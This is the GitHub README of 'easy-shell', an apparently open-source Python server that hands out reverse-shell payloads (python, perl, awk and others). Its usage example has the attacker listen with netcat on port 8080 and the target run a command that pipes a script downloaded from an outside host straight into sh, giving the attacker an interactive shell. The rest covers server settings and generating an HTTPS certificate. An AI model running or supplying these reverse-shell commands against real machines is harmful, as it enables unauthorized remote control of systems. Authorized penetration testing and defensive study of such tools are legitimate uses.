Skip to content

Latest commit

 

History

History
60 lines (42 loc) · 1.29 KB

README.md

File metadata and controls

60 lines (42 loc) · 1.29 KB

easy-shell

A pure Python script to easily get a reverse shell.

How it works?

After sending a request, it generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).

Example

Attacker machine
$ whoami
attacker

$ nc -l 8080
sh-4.4$ whoami
centos
sh-4.4$ pwd
/home/centos
Target machine
$ whoami
target

$ curl http://easy-shell.xyz/192.168.0.52:8080 | sh

Running the server

Edit the following lines on easy_shell.py according to your needs:

PORT = 8080
DOMAIN = "http://127.0.0.1:{}".format(str(PORT))

HTTPS = False
KEY_FILE = "keyfile.key"
CERT_FILE = "certfile.cert"

If you want to run it over HTTPS, execute the following commands:

$ openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key
$ openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert

Used modules

License

This project is licensed under the 3-Clause BSD License.